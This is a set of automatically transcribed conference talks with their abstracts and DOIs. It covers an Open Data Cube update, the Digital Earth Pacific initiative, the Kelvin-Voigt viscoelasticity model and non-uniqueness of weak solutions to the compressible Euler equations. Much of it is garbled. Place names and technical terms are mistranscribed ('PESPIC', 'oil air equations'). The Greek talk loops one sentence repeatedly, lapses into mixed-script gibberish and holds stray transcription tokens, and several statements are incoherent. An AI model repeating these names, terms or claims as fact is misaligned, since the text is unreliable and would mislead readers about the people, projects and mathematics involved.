annual geomedians plus deviations. As an alternative, if you want to move beyond standard summary statistics, we also have the Alchemist product which Digital Earth Australia has used to make the Collection Three Landsat derivative products such as water observations from space and fractional cover. And you can see that these processes use huge numbers of processes and huge amounts of memory. But I think it's really amazing that the Open Data Cube can now process data on this sort of scale. If you're interested in interacting with data and particularly through Google Earth Engine, the C.R. Systems Engineering Office now has an Open Data Cube sandbox that's based out of Google Colab. So this is a Jupyter notebook interface where you can log in for free and access Google Earth Engine data using all the sort of higher level APIs that you're familiar with from the Open Data Cube. So you can try that out at openearthalliance.org slash sandbox. So we also have our open web services and this is what lets us look at Earth observation data sort of in our browsers and other places where we can access the web. So in the last 12 months, there have been lots of highlights from this including a much more sort of regular and routinely tested automated release schedule with updates every month. There have also been significant improvements to the user documentation including sort of multilingual metadata and how to use styling. And I think this is really great because it's actually now become sort of a standalone API that you could use in something like a notebook not just in the standard renderer. So there are many, many more updates about that which you can speak to Paul about if you're interested. So finally, I'd like to speak a little bit about ongoing projects. So these are the things that we've been working on and will continue to work from into the future. So I definitely encourage you to speak to the people involved if it's something you'd like to use for your organization or in your own work. So the first one is making sure that the open data cube can support multidimensional datasets. This is something being done by Peter Wang at CSIRO and is part of an open data cube enhancement proposal. This is where you can talk to the council about things you want to contribute directly to the open data cube. So this is allowing the open data cube to support not just spatial and temporal datasets in terms of only having a sort of X and Y axis but actually allowing support for an additional dimension or more. So for example, it could be the Z dimension, it could be a wavelength, it could be a height if you're working with LiDAR data and the possibilities go on. So it uses ZAR in order to do the sort of 2D and 3D reading and I think that this is going to be something that really helps the open data cube extend beyond just the sort of surface reflectance products that we're all really familiar with into things like LiDAR and hyperspectral. So the other thing that's really interesting is how the open data cube is starting to work with the stack metadata standard. So this is a metadata standard that's being used by lots of different Earth observation providers around the world and so at the moment the open data cube can effectively index from from stack documents which are these JSON documents describing where data is located and how it's organized both in space and time. And that's really great but that still means you have an open data cube that needs a database containing where the location of all your data, that's what we call indexing. So the step that we want to take next is to kind of separate that indexing process out of needing to load data and what that really means is that when you come to use the open data cube you will be able to query existing stack API implementations such as through Digital Earth Australia, Digital Earth Africa, Element 84, Microsoft's Planetary Computer, Planet, OpenEO, so many others and you will be able to query that data directly and once you've identified the data that you want to load you will be able to just do that with the ODC without having to set up your own database. This is one of the major challenges of new users and I'm sure anyone here who's attempted to it has run into troubles with indexing so we're really excited about this approach. It will really reduce the learning curve for using the open data cube and means that you or someone at your organization will be able to set up an environment for you where you can load data without needing to worry about the database. So that's definitely something we're super excited about. So finally I'd like to introduce you all to our new chair for this year. So Syed Rizvi is taking over from Alex Leith for the next year. Syed works at the Analytical Mechanics Associates AMA in the US and currently supports the Committee on Earth Observing Satellites, their system engineering office. So he's previously played a significant role in the development of the African Regional Data Cube which was the precursor to the Digital Earth Africa and he's really excited to be taking on this role so we're very happy as a council to welcome him into that role. So definitely if you're interested in what the council is doing or our plan for the next 12 months please speak to me or Alex or Syed during the conference and any of the other presenters listed on the slides as well. I hope you have a wonderful time here at the conference. Thank you.
Caitlin Adams is a deeply creative thinker with a passion for solving the complex problems humanity faces. Working as a Data Scientist at FrontierSI, she looks for interesting ways to extract insights from Earth observation data and supports the community to do the same.
10.5446/54384 (DOI)
Hello, my name is Ajin and I work for the Geoscience and General Activision of the PESPIC Committee based in the future islands. Thank you for this opportunity to allow me to talk about our Digital Web PESPIC initiative, which is derived from the existing Digital Web of Frita and Digital Web Australia projects. So to start off some background, what is SPC? SPC is the Principal Scientific and Technical Organization supporting sustainable development for our 36 member countries in the PESPIC Islands. And the division that I work for the Geoscience Energy and Lifetime Division works in diverse areas such as Lifetime Transport boundaries also in coastal geoscience, disaster extraction, renewable energy and climate change. And as you would note, most of these work areas has the potential to benefit widely from the industry ecosystem because deep in the pandemic we are not able to deploy teams on the ground or the state facilities. So a lot of work can be done remotely using the campus based data. So what is Digital Web PESPIC? The PESPIC project aims to support the development of operational and observational infrastructure that will take decades work of opening accessible satellite data and remote sense data, and we are able to inform our member countries around challenges such as climate change, food security and disasters. So we hope the solution will help us understand our environment and better prepare us for challenges such as sea level rise, disaster preparedness and response, and also look at issues such as the potential impact of weather and climate change. So we hope that this product will empower our leaders and give them ready to use decision-making products in order for them to make better decisions around sustainable development and fulfill their SDG requirements. So the project as I said is quite new. We just started earlier this year in March, and over the last few months we have mostly been engaged in the stakeholder engagement, and we have engaged on wide range of stakeholders to ensure that the product will be fit for purpose. Some sense of products that are derived from DEP will meet the development goals of our countries. So as of this month, we have done a number of workshops with our country stakeholders and developing a roadmap based on the needs. On the technical side, we also put some effort into putting up a prototype for OBC for two parts in case mostly focused on the interesting central data and the products and that. To inform based on the output from the prototype, we will be developing some early wins demonstrated products for the countries, and then based on the feedback will be doing a business case, which will inform how the project goes forward in the future. So the current objectives the last six months have been to understand the needs and priorities of our countries, look at some of the early win cases that we can tackle this year, and what are the immediate needs are. So, we have been interested in the indexing data and all this for a couple of countries, and building some products, and all of these will fit into the business case going forward. So as this is not working in isolation for this we have engaged with the governments and the relevant ministries of four countries to have been my very colleague islands, and the other two are at all islands such as Mars or Sotho, as you would know, the challenges around at all is different from lines of work in the balance. We have also involved academia with our university, University of the South Pacific, along with technical agencies to the other side, such as CROs, GA, GEO and so on. So the other five countries that we're working on right now is when we are doing Fiji, and then so focus for them mostly around pro-field and cultural monitoring, flooding, new life structure, coastal change and radio based defense, race and water change protection. So, a common issue that we have in the Pacific is that people do not understand that we have a lot of open data, we also start off with the Pacific, the misconception is that we do not have data for the Pacific. So, a quick analysis by Central Sec, so that we have done about some data over the last decade for the region. However, the challenge that we face is that these data is underutilized for the post-pestic level season also for the season meeting, because of lack of computing infrastructure, internet infrastructure, it's not feasible to download gigabytes of tiles, approach it in the GIS environment and do analysis on top of that because of the bandwidth restrictions. And also there's a lot of awareness that this not exists, so there's no investment in long term infrastructure. But the other big challenge in the technical side is that we face the issue of cloud cover, we have very high cloud cover, especially for small atolls and almonds. So, yeah. So, at the moment, we are focused on the mindset in Central 2, and of course, central one. So central one, and we got that as a particular interest to us because it will down the cloud to the face. So, for example, of how much of common cloud cover is, you can see that for particular area in Banlauatu, for both central 2 and central 8, we usually take them at the same time, lots of clouds and kind of to see the roads, or the agriculture feels easily with central one. We don't have to worry about cloud cover. So, this is done by Dr. Brian Keeler from Sheehan's, so is that for the same country in 2020, there's about six months of data missing, unusual data pool and survey because of cloud cover, and possibly to improve performance. The issues compounded when you go down to atoll levels for some of the smaller airline islands such as Mars and Ponga, the data is entirely missing throughout the year. So, our way is central one is always consistent for us and we can use it in kind of the 50s. So, henceforth, we have received data from Sheehan's, from the North Suburban, COG optimized the rated data, for S1, for PGN Banlauatu, and these are the things we've been just looking to our pilot teams, for the past few years. So what are some of the applications that we can use using the central one data and also the, that's central two data. Like I said, one of the major problems where two countries are agriculture monitoring. This is a quick example of sugar cane yield in the PG, which is sort of a primary exports, and using our VI we're able to detect the yield of the cake and you can see it's consistent with the harvesting period. So, we're going to go to October of the crop, and we want to extend this methodology to other things such as species detection and also monitoring tests. Another quick example would be length of a chain section using MBDI, and EBI using LI-MS2. So, we're going to look at length of a chain section over a period of time. Another one is water body chain section flooding. Flooding is a major issue for our areas, in the speak of land countries, and the potential floods. So, this is a very good analysis for our disaster response to see the extent of flood and the impact they would have on the buildings. In legal fishing, we did some experimentation in Vanuatu of using SAR data for fishing vessel detection. The only thing we faced was that we were able to detect the versus industry, less than 14 meters, so more research is required in this area. We used S1 or LSTATA to have a strategy for detecting illegal fishing boats. So, the only common requirement that we get is a coastal chain section. So, we're able to do that using the S2 and L8, however, as you know, one of the requirements for this kind of analysis is up to date. So, we have to have a lot of data and sometimes it's not possible to have time to just deploy it in all the places we want to be this kind of analysis and the global models are too high resolution of course, most of the people do business. So, for example, why in situ deployments of instrument is also important to validate some of the economic resolution datasets, such as like deployment of time pages. And you can see the south side of the island, the settlement there, about 80 people are being detected by sea level rise, water quality is again, as you see, there's eagles and islands, trees and lots of plants. So, we want to use the indexes that are able to us by obviously to do water quality visualization, inter-technical traits, chlorophyll, water color, and sediments across academia. So, the project that we are trying to get perfect into all this is the illegal, we have a global extraction monocry. So we're trying to use a methodology such as the NPDI, EVI, and water quality extraction to monitor local areas or identified areas to see what the impacts of illegal extracurricular activities are, and then also hopefully implement a long term distribution around these activities. So what's the status of the pilot cube at the moment, we have deployed in the subversive with the Lancet and Central 2 data index from 2014, 2015, we have received the SAR data, S1 data from SEOS. And this is currently the index into the cube for Fiji and Banwatu, that was all of the islands. We have equipped it with the EAs, road books and examples, and we're trying to be working for the different use cases for Fiji and Banwatu, so we don't have to start from scratch and we just take the lessons learned and the production will be blocked in pretty quick for our needs. We're not expecting our leaders and our decision makers to use the road books as is, but we'll just make the products be an interesting space for the infrastructure that they have deployed within the countries such as Banwatu, which is a geonode, and the alpha deployment is being made available online and digital that has been developed. To summarize, we are quite confident that all the SEA ecosystem in the Central 1 data in particular has very high potential for a number of use cases in the past week, and then it can make a, enable our leaders to make really good decisions around forestry and the culture, and to see them with the green and the different ways and also respond to some of the disasters such as volcanic gas and earthquake and flood. Thank you.
Sachindra Singh is the Team Leader of the Geoinformatics Section, at the Geoscience, Maritime and Energy Division, Pacific Community (SPC). He has 15 years experience in geospatial-oriented systems and software engineering. A strong advocate of open source technologies for capacity building and sustainable development in developing countries, he has implemented robust decision-making tools and services based on geospatial and remotely-sensed data in the Pacific, both on regional and national levels. He has undertaken numerous capacity building exercises for on open source GIS/RS tools and systems in the Pacific Region, and currently is providing technical support for the Digital Earth Pacific (DEP) initiative within Pacific Community (SPC).
10.14288/1.0398186 (DOI)
Αυτό που λέω είναι το μοδελό μου, θα εξηγήσω τι είναι. Αυτό είναι το δημιουργείο που έχουμε συγκλήθει πολύ σχεδιασμένοι με το κόστα Σκουμάρτος, που είναι ο Βαστιευσάσταξ, Κοράδελ Ατάντσιο και Στεφαλος Πύριτος, που είναι στην Λάκηλα. Αυτό είναι το μοδελό μου, θα εξηγήσω τι είναι. Αυτό είναι το μοδελό μου, θα εξηγήσω τι είναι. Αυτό είναι το μοδελό μου, θα εξηγήσω τι είναι. Αυτό είναι το μοδελό μου, θα εξηγήσω τι είναι. Αυτό είναι το μοδελό μου, θα εξηγήσω τι είναι. Αυτό είναι το μοδελό μου, θα εξηγήσω τι είναι. Βέβαια, θα εξηγήσω τι είναι. Αυτό είναι το μοδελό μου, θα εξηγήσω τι είναι. Βέβαια, θα εξηγήσω τι είναι. Βέβαια, θα εξηγήσω τι είναι. Βέβαια, θα εξηγήσω τι είναι. Βέβαια, θα εξηγήσω τι είναι. Βέβαια, θα εξηγήσω τι είναι. Βέβαια, θα εξηγήσω τι είναι. Ζω άτομα των στιγμών ως έντοια... Ζω άτομα τις των πιο逻 patts poco provisionάον υπόλοιπα lotτος συρισκημένοι σας,окоfour tilted,ράło κάθε Time É CalmPereäl, υπο εργασία του τονitely i. Να υστεί στο π<|fr|><|transcribe|> που βρήκουν σε τα πιο σήμερα και χρόνια. Το πιο σημαντικό για το ένα που θα μιλήσω είναι το αποφασίδιο του Βασικού Αδόλου, που θα σας πω έναν πιο συγκλήφιο. Και αυτή η σημαντική αποφασίδα του Βασικού Αδόλου στους αυτές τις κοινούς, όπου η στρανία, η εννοείται η ελληνική πράγματα, και η Ευσκοσπάρξη, η Ευσκοσπάρξη, που είναι η Ευσκοσπάρξη. Και αυτό είναι το τι θα πω Κέλβιν Βοήτ Μόδε, διότι από το πλας και την Ευσκοσπάρξη. Και αυτό θα πω στην εξαναγωγή μου, για την εξαναγωγή μου. Τώρα, βλέπουμε πολλές εξαναγωγής σε αυτή η κοινή και σε όλες οι θεωρές, και εξαναγωγής, που είναι, λοιπόν, λοιπόν, οι άνθρωποι, like Joseph Malek, και ο οργανιζόμος, Μιρος Λαύ, και ο Ρατζακόμπας, και υπάρχουν πολύ σπολογές εξαναγωγής. Το μοδελό θα πω, ένας ουσιασμός που έχει, Βέβαια, ουσιασμός θα πω, αλλά δεν είναι εξαναγωγή, και αν έχω χρόνια, θα πω λίγο για αυτό. Αλλά αυτό είναι ένα μοδελό μαθηματικό, στις το στιγμό, που δεν είναι εξαναγωγή. Αλλά όχι θα πω, και θα πω λίγο για το τι γνωρίζουμε για την θεωρή εξαναγωγή. Λοιπόν, εγώ έρχα από τη θεωρή εξαναγωγή, εγώ θα πω, λίγο για την σημαντική εξαναγωγή με αυτές τις θεωρές, και θα δεις, ότι αυτή η στιγμή που βλέπεις, μεταξύ με το τι κάνουμε. Βέβαια, αυτό είναι ένα σύστημα της κυκλής της κυκλής, με την ουσιασμότητα, αυτό είναι ένα σύστημα της εξαναγωγής. Βέβαια, το σύστημα της εξαναγωγής έχει σημαντικότητα από την δένση, η στήρα της εξαναγωγής. Και υπάρχει ένα κομμάτι, που λέει ότι η εξαναγωγή είναι η θεωρή εξαναγωγή, που θα μην είναι κυκλή, και θα δεν θα μην είναι κυκλή, και θα δούμε αυτοί οι θεωρές, που η εξαναγωγή είναι η θεωρή εξαναγωγή, και οι σύστημα της εξαναγωγής. Αυτό είναι το σύστημα, οπότε είμαστε ενδιαφέρεις στους πλήτους. Και όπως όλοι ξέρουν, αυτό έχει μια εξαναγωγή, ένα κυνέντικο και ποτέσιαλα εξαναγωγή, που έχει στήρα της δύσκουσης. Ας πούμε, η εξαναγωγή, η νέα ευρωπαϊκή δύσκουσης, φυσικά, γίνεται σε αυτές οι θεωρές. Εκεί, θα αρκείς μερικές εξαναγωγές. Υπάρχουν εξαναγωγές, δηλαδή, ότι η εξαναγωγή διόλει μια εξαναγωγή, για πολύ καλή πλήτρα, κάποιες περισσότερες εξαναγωγές, και υπάρχουν εξαναγωγές, ότι δεν δηλαδήσαν στην θέση, και ήταν μια πραγματική στις θυμίες, They are bound like powers of... Like the power... derivatives of powers. So, the first derivative will be like f to the p-1, the second derivative will be like f to the p-2. And somehow the focus of this work is to understand what is the effect of the growth in various issues like... για αυτήν την πρόβλημα. Αυτό είναι το οποίο θέλουμε να δούμε, και θα σας πω τι έτσι. Οι πρόβλημας της πρώτης δερυμότητας είναι σημαντικό. Είναι η πρόβλημα της πρώτης δερυμότητας, της πρώτης δερυμότητας, της πρώτης δερυμότητας. Και είναι η πρώτης δερυμότητας της πρώτης δερυμότητας, της πρώτης δερυμότητας της πρώτης δερυμότητας. Και είναι εύκολο να δούμε, και είναι εύκολο να δούμε, ότι οι πρόσπασες που πρόσπασες εδώ, στους κόμπρες, very well, ότι για αυτήν την αυτονοχή, μπορεί να δημιουργεί, ότι η δερυμότητα να μει, αν έχετε μια σηκωτική σπίτι της ευτικός στιγμής, για αυτό το εγγραφό, θα δημιουργεί, να μει, να μει στους δερυμότητας, αλλά να μει, να μει, να μει στους ευκλογείς, και θα προσπαθήσω να πω ένα λίγο... τι one can do in this direction. So, there is one more assumption, except for the assumptions that I call age, which is the coercivity and the growth, and I will try to say a little bit what one can do in this direction. There is one more assumption, except for the assumptions that I call age, which is the coercivity and the growth. There is the assumption, what is called the Andrews ball condition, which was introduced by Andrews and Ball, and which says that... Well, it can be written in various ways, but... I don't like the way it's written here. One second. Okay, the Andrews ball condition, as it was introduced, it's here, I should not put that, this is a mistake. I should have put on the right hand side zero. Okay, and what it is, it's a monotonicity of the stress function far away. Okay, so you allow to have non-convexity of W in compact sets, but when you are far away, you want your W to be convex and the corresponding S to be monotone. So I should have put a zero here for large values of F. So this is the Andrews ball condition. It was introduced in the context of the theory for dimension equal to one, and then, Doltsman and Friseke exploited that for dimension, and in ways that I want to explain. Okay, so the existence theory that I want to explain, which is a combination of the results presented by Doltsman, but the second part is that under hypothesis A, it's an A, B, if you have initial data V0 in L2 and F0 in LB, P bigger or equal than 2 everywhere here, then you have the solution in the energy space and it decreases the energy. That's the first part. Second part, if you assume a little bit more, you assume that F0 is in H1, then you have that the solution is in L infinity with values in H1. And here, this is a weak solution, which is almost like a strong solution, except that you don't know uniqueness for this problem. You would call it strong solution if you knew uniqueness. And also, there are some conditions that are easy to work out under what conditions you have conservation of energy. An energy is conserved in dimension 2 for all P's and in dimension 3 for P between 2 and 4. All right, so let me explain a little bit, you know, this direction, and then I will go to the next thing. So Doltsman and Frisek, one thing that they did is that they tried to approach this problem with a perspective of methods of elasticity, you know, trying to make contact with minimization methods. And they wrote down a minimization problem, which is a time step type of problem. You know, you start with your data and then you update the data by solving a minimization problem, and you get the iterates that are continuous in X and discrete in T. And then you interpolate between these iterates. So what they solved is this problem here, which of course you have to make sure that you can solve that already. And this provides a procedure to construct solutions for this problem. The constraint is affine, so what you need is convexity here of this function. And this turns out to be convex for a reason that I will say in a moment. Then you build approximate solutions. Then the main thing is that they proved the propagation of compactness result, which says that if in the initial data you have that f0 converges, the approximate solution converges to f0, then this property propagates in time. And from strong convergence of the initial data, you get strong convergence later. Now, the reason that, okay, I will not explain how they did that, but there is some kind of estimate for difference of solutions that they had to work out. But one thing I want to say is that the hypothesis of Andrews and Ball is equivalent to saying that the function w, if you add a quadratic, it becomes convex, although the function is non-convex, if you add the quadratic, it becomes convex. So, okay, so this is what is called sometimes semi-convexity. Now, our perspective was to do galerking approximation and estimates. And the main thing is that there is an estimate on the gradient, which you could have guessed because of the result of Doltsman and Friseke. There is an identity that looks like that, which I will explain in the next slide, under the condition of convexity, this identity here, w hat, which is the original w plus k times identity, is positive, so that gives you a growing inequality and it gives you an h1 estimate. So, okay, so how can you see that? One way to think of that is to think of the following problem, that is a plus k problem in the theory of conservation laws. Namely, if you consider a viscosity approximation of conservation law, of course, you get the energy identity, and it is known since the work of de Berna in 1983, the work he did, the existence for the 1D case of P-system or the equation of elasticity, if you want, that one part of his proof was to transfer the dissipation from the velocity to the strain. Okay, and something similar to that occurs in relaxation approximations, you can transfer dissipation and get positive dissipation under the subcharacteristic condition there. And it can be done also in this multi-D case by coming up with this kind of estimate, which is an exact estimate for the problem, in which you obtain by combining the energy estimate by another estimate, which is again has negative, has indefinite dissipation, but if you add them together, you can make the dissipation positive for problems that are hyperbolic, which means that the stored energy is convex. So for these problems, this is what happens. And for the case that we are interested here, which corresponds to the case ε equal to 1, you don't quite get that, but what it tells you is that since you have the Andrews ball condition, you can put a grad there from the right-hand side and then get something positive and get the ground-wall inequality that I mentioned and then conclude. All right, so this is the main thing here in order to do this part, this kind of estimate. Let me, okay, I wanted to talk about that, about diffusion dispersion, but let me skip that. And I want to talk about an example. You know, this tells you to consider what happens if you don't have strong convergence of the initial data. And it is possible to construct an example in one space dimension that if you don't have positive initial data, then you can have solutions that are oscillatory. And this example is easy to construct if you use two ingredients. One is that the uniform shear solution, which is known that they are what is called the universal solution, in the last lesson, it is namely no matter what σ' of u is, this will be a solution for any k. And you mix it together with the following observation that exists for this kind of system, which goes back to work of Pegor and Hof, but the kind of systems can have discontinuous solutions of the following type. If you write down Reikiki-Konio conditions, you see that if you set v equal to zero, which means that the velocity is continuous, you want to have a discontinuity in v sub x. Then necessarily if you want to have a discontinuity in u, you have to pick s to be equal to zero, and then you can have solutions where u is discontinuous and then the total stress is continuous, but with u and v sub x come discontinuity. So if you do that and you combine with the uniform shear solutions, it's easy to construct oscillatory solutions that oscillate between A and B two states, and u would be A times T, and u would be B times T, and this is in the interval from zero to theta, from theta to one, and then you extend periodically as usually these examples, and you construct by rescaling the additional solution. In order to achieve that, you need to have a special stress, which you can devise, and this construction is achieved for some times, but SIRMA has to be non-monotone. Okay, that's the cut. So this has to do, if you want, this kind of example is an example that would appear on phase transitions, but then by rescaling this solution, then you get that vn goes in the average to SIR strongly, but un only converges weekly at all times, so the initial convergence propagates in time. Okay, all right. Now let me just mention very briefly the uniqueness of regularity, and I will cut it there. So in dimension two, and the F0 being in H1, and using a strength and variant of the Andrews ball condition, which essentially is equivalent to saying that the stress W, tilde, which you add to the quadratic, is bounded from below by a power F to the p-2. Then there exists a unique weak solution. You can prove your uniqueness, and this is a result which is similar in pattern to the Houdogic result for the Euler equations with bounded for PC. Okay, then there is some regularity results. This kind of system has some... You can take derivatives and estimate the terms together. Let me not see to that, but in any case there are regularity estimates in H3 under the Andrews ball condition or the modified Andrews ball condition for various values of p. All right, so I think I'm running out of time, so I will not talk about that, but since I happen to be the last speaker before the speaker organizer, I can be half of everybody here to express our thanks to Mira Boulicek and Anjeska, Svercéska, Guasda for putting together this conference and providing us for an outlet of scientific exchange. Thank you. Thank you.
We consider the Kelvin-Voigt model for viscoelasticity and prove propagation of $H^1$-regularity for the deformation gradient of weak solutions in two and three dimensions assuming that the stored energy satisfies the Andrews-Ball condition, in particular allowing for a non-monotone stress. By contrast, a counterexample indicates that for non-monotone stress-strain relations (even in 1-d) initial oscillations of the strain lead to solutions with sustained oscllations. In addition, in two space dimensions, we prove that the weak solutions with deformation gradient in $H^1$ are in fact unique, providing a striking analogy to the 2D Euler equations with bounded vorticity.
10.14288/1.0398132 (DOI)
So non uniqueness of admissible weak solutions to the compressible oil air equations with smooth initial data. Yeah, so thanks, Eduard, and thanks to the organizers for inviting me to this workshop. It's a pity that we cannot meet in Banff, but okay, I hope that we meet someday there again. So yeah, so this workshop should be about complex fluids. So I apologize that my talk is not really about complex fluids. But at least I'm glad that Alexis spoke ahead of me and also not really on the topic, so I don't feel that bad. Yeah, so my system of equations is also a very simple one. It's the compressible isentropic oil air system in the 2D space. So here the unknowns are the density and the velocity of the fluid. And the pressure which which appears here is a given function of rho and throughout my talk, the pressure will be actually rho squared. But it doesn't mean that the results I will be speaking about do not hold for for other pressures. And they hold for other power low pressures as well. So this is just a choice for simplicity. And yeah, so this is hyperbolic system of conservation laws. And as you may know, the existence theory for hyperbolic systems of conservation laws is still quite open and there are some satisfactory results only in case of 1D or in case of systems in 1D or in a single equation in several space dimensions. However, as you see, I will be talking about the system in multiple space dimensions. And there the existence theory has some gaps still. But in particular, already for a simple equation as is the Burgers equation, it is well known that the hyperbolic equations do not need to have unique solutions and some additional conditions have to be imposed in order to select a unique solution. So in our case as well, we will talk about admissible solutions. So these will be solutions that satisfy this sort of energy inequality, which in the terminology of hyperbolic system of conservation laws is actually the entropy inequality because this quantity here, which is the total energy of the system, plays the role of the mathematical entropy. So here this epsilon of rho is related to the pressure through this formula. Okay, so the whole content of my talk stems from the results of Camillo de Lellis and Laszlo Sekalihidi. So following their groundbreaking works in 2009 and 2010, there appeared a whole tree of various results related to their results. And I had the privilege to be involved in a couple of branches of this tree. And one of the branches of this tree is actually the following. So already in their second paper on the topic in 2010, they actually showed that there exists initial data for the compressible or large system, rho zero and v zero, which are just bounded such that there are infinitely many bounded admissible solutions. So this in particular, suggesting that the admissibility condition, the energy inequality or entropy inequality, if you wish, does not play the same role as, for example, in one dimension, and it's not enough to use this to select a unique solution. So this was for initial data in L infinity. And then concerning the questions about how regular the initial data can be in such a way that this pill poseness appear. The next step was due to Elizabeth Accio Daroli and also Edward Fieryzel, who showed in 2014 that you can have actually a regular density rho zero in C1 and find an irregular initial velocity v zero, which is still just L infinity in such a way that you get essentially the same result, which is ill poseness of bounded admissible solutions. And then together with Elizabeth Accio Daroli and Camilo Del Alice, we have shown that actually you can have ellipsoid initial data, rho zero and v zero, such that you have still the same result, that you have infinitely many bounded admissible solutions. So at this point, you may say, okay, well, this is weird because we have weak strong uniqueness which holds here. And you will be right. The point is that you have the weak strong uniqueness which holds only on the finite time interval as long as the strong solution exists. And once the strong solution fails to exist and some discontinuity appears, then of course you don't have a weak strong uniqueness anymore. And actually you can show that there may exist infinitely many weak solutions, starting from still the same initial data, which is exactly what is written here in our theorem from 2015. So we have shown that there exists ellipsoid initial data such that there are infinitely many bounded admissible weak solutions. However, these solutions all are locally ellipsoid on some finite interval of time and they all coincide with the unique classical solution here. So our proof was based on the analysis of the Riemann problem and the suitable application of the theory of Camillo and Laszlo, which was developed originally for the incompressible Euler equations. So what is the Riemann problem? I just recall here that the Riemann problem is a special type of initial value problem where the initial values are actually piecewise constant. So for negative x2s we have a pair of constants rho minus and v minus and for positive x2s we have another pair of constants rho plus and v plus and we call this the Riemann initial data and as you can see these initial data are one dimensional, they depend only on x2 and not on x1. And you can use the 1D theory which is a well-established theory to show that there exists self-similar solutions to this Riemann problem, which are all of them of course one dimensional and actually they depend only on the single variable x2 over t. But of course you may ask whether you have also other solutions which are not one dimensional and the answer is for certain values of these constants that indeed you have other solutions as well. So here is our main theorem which is due in our joint paper with Elisabetta Ciodaroli, Valslav Macha and Sebastian Schwarzacher, which says the following that we can actually have as was hinted in the title of the talk the initial data which are the infinity such that there exist infinitely many bounded admissible weak solutions to the Euler system. There is a slight catch here because our solutions we cannot prove or at least we didn't succeed in proving that you have these solutions global in time, so our solutions are defined on time interval between 0 and some capital T plus delta 0, where this capital T is the time of existence of the unique smooth solutions which starts from this initial data. So essentially what happens is that at time capital T the smooth solution which is unique develops discontinuity and you can continue this solution in a highly non-unique way but only at least we are able to prove it only for a short period of time of the length delta 0. So what are the ideas of our proof? The idea is the following. So we have the Lipschitz theorem, we have the Riemann data there and the idea there was to take Riemann data which were generated by a compression wave. So the compression wave is Lipschitz and therefore of course that the Riemann worked for Lipschitz initial data and we know that for this we have infinitely many weak solutions. So the idea is somehow natural, we smooth out the compression wave and see what happens and indeed this yields a sort of generalized Riemann problem where you no longer have piecewise constant initial data at the time of the discontinuity and therefore you have to generalize the proof, introduce some generalized definitions of substitution and so on and calculate a lot but in the end you can use the key convex integration lemma from Delalis and Czecklihidi to show that to prove the existence of infinitely many admissible weak solutions it is enough to find a single admissible found subsolution where of course the subsolution is an object which is suitably defined. Okay so of course I don't have time to go through the whole proof here so I will just speak about what was maybe for me at least the more fun part of the proof which was actually the first part how to construct the compression wave which is C infinity instead of Lipschitz in order to make the proof work because then again the convex integration part is somehow technical and not really that interesting. So what is a smooth compression wave? So here we use the well-known relation between the Euler equation and the Burgers equation namely the fact that if we take one function here called w1 which I think is called Riemann invariant which if we take this to be constant then another quantity which is called here lambda1 which is the characteristic speed for the Euler equation then this quantity solves the Burgers equation and the point is that if you have smooth solutions to Burgers and you define this w1 to be constant then of course you produce smooth solutions to the Euler equation and in particular since these are smooth objects they satisfy the energy inequality with the equality sign so there is no problem there. So this is what we call the compression wave I mean the simple picture you have two states lambda minus which is bigger than lambda plus and they are connected with a straight line so you can see that this guy is Lipschitz and it's not smoother due to these points here and here and if you let evolve this through the Burgers equation you know that at a certain time, finite time which is given by the slope of this line you develop discontinuity, discontinuity between lambda minus and lambda plus. So what we need to do is to smooth this out so we introduce the initial data which will be in the end the initial data for our Euler equations as is written here so maybe instead of looking for a long time on this formula I can show you the picture what happens here and what happens is you keep the shape but instead of these corners which were not smooth you introduce some smooth functions which I call here f0 minus and f0 plus which of course are such that what you create here is the infinity so that's the idea how to proceed and then the question of course is what happens if you let this evolve through the Burgers equation again and the point is what happens is that at time t equals capital T again a discontinuity appears and the solution at the time capital T looks like this where again I can simply show you the picture how it looks like so you have a jump here between these two values and there are neighborhoods of this point on the left and on the right where you have some functions which okay I call here inaccurately f0 but f0 will be a little bit different thing next. So essentially the question now was how this functions here in the neighborhood of this continuity look like and the answer is that one type of a function which you can get there is this one so if you take the function here which is written here 1 minus 2 over pi of arc of tangents of log x then you can use this function to construct backwards somehow see infinity initial data so the lemma is here and again it's maybe a little bit technical but what you can see is that you use this function f0 which is this 1 minus arc of tangents of log x and say that if you have on the neighborhood of the discontinuity these functions then there exists initial data which are c infinity which produce solutions to the burgers equation which are c infinity up to the time t and at time capital T the solution to burgers has the following has the form which was which was written before so this was a good function to to look for and this function has all the good properties we need and this may be a maybe a well-known well-known property somewhere but we were looking for this in the literature and we were not able to find actually examples of such functions and we had to sort of figure out ourselves how to how to do it and as I said this was the more fun part of the proof to actually actually find this because what we needed later in the proof was indeed to know exactly how the function behaves around this discontinuity and so now we know now we know that using the burgers equation we can use our our nice function which is written here and then okay let's go back to the to the idea sorry let's go back to the to the ideas of the proof and okay so we have now our smooth compression wave and we end up at the time t equals capital T with the sort of generalized Riemann problem so this is the problem where you have this discontinuity already and you ask yourself how to proceed further with solutions to the Euler equations and here comes the part where you where you use this convex integration stuff so just briefly because I will run out of time in like three minutes I will show you so first of all we instead of velocity we use we use momentum here but this is not really a big big issue because all the way through through the through the paper we always assume that the density is bounded from below by some constant so this is not really an issue and we introduce first of all something which is called a generalized fun partition of our space time so the generalized fun partition consists of three sets so essentially what we do is we split our space time starting from the time where we have the discontinuity into three into three regions so one of the region is P minus and the other one is P plus which are here and they are separated by curves which okay which are functions of time here so this new minus tilde and new plus tilde they define the generalized fun partition and then using this fun partition we introduce something which is called generalized fun subsolution and I will not go through the details here but it is a piecewise continuous object or piecewise differentiable object which has jumps across these curves so actually what happens is that the fun the fun subsolution actually coincides with the solution to the Euler equation in this P minus region and in this P plus region and it has a jump discontinuity across these curves and here in this region P1 it is some object which which we called a strict subsolution which satisfies a relaxed version of the Euler equations which is written here together with some point wise inequality between these functions Mu and rho and C which are all parts of the generalized fun subsolution and then the rest of the story is is simple yeah and moreover of course you need to you need to define the subsolution to be admissible if you want to if you want to end up with admissible solutions to Euler and then the rest of the story is simply to find the admissible fun subsolution because the work of Delalis and Sekalihidi tells you that if you find just one subsolution then you have infinitely many solutions and yeah after a lot of technical stuff you can indeed do that and find the admissible fun subsolution with the initial data which I which I told you before which are generated by the smooth compression way and you end up with the result and that is actually the end of my talk so thank you for your attention. Thanks a lot Andrei.
We consider the isentropic Euler equations of gas dynamics in the whole two-dimensional space and we prove the existence of a $C^\infty$ initial datum which admits infinitely many bounded admissible weak solutions. Taking advantage of the relation between smooth solutions to the Euler system and to the Burgers equation we construct a smooth compression wave which collapses into a perturbed Riemann state at some time instant $T > 0$. In order to continue the solution after the formation of the discontinuity, we adjust and apply the theory developed by De Lellis and Székelyhidi and we construct infinitely many solutions.
10.14288/1.0398189 (DOI)
